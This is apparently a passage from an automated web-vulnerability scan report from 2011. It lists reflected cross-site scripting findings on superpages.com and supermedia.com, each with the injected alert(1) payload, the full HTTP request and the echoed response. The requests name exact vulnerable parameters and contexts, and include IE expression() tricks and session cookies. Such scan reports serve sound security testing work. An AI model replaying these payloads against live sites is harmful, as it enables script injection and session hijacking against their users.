GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:13 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
1.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/
1.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:20 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow"> ...[SNIP]...
1.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:16 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57268 Date: Thu, 03 Feb 2011 17:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/ Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:29:25 GMT Content-Length: 66686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... ype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:57 GMT Content-Length: 66498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... tp://yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'ht ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/ Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:18 GMT Content-Length: 128435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');"> ...[SNIP]...
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/ Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:33 GMT Content-Length: 126537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ww.superpages.com"; s.prop5 = "Advanced Search, Business Profile"; s.prop9 = "Advanced Search"; s.eVar23 = "Advanced Search"; s.hier1 = "Advanced Search, Business Profile"; var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516"; if(s_campaign){ s.campaign = s_campaign; } var s_code = s.t(); if(s_code) document.writeln(s_code); //--> ...[SNIP]...
The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/ Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:23 GMT Connection: close Content-Length: 23380
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/ Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:03 GMT Content-Length: 66496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... archtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/ Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:28:30 GMT Content-Length: 60956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank - Handlin ...[SNIP]... = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
1.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/
Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:48 GMT
Content-Length: 23390
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... pe="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:03:55 GMT
Content-Length: 57628
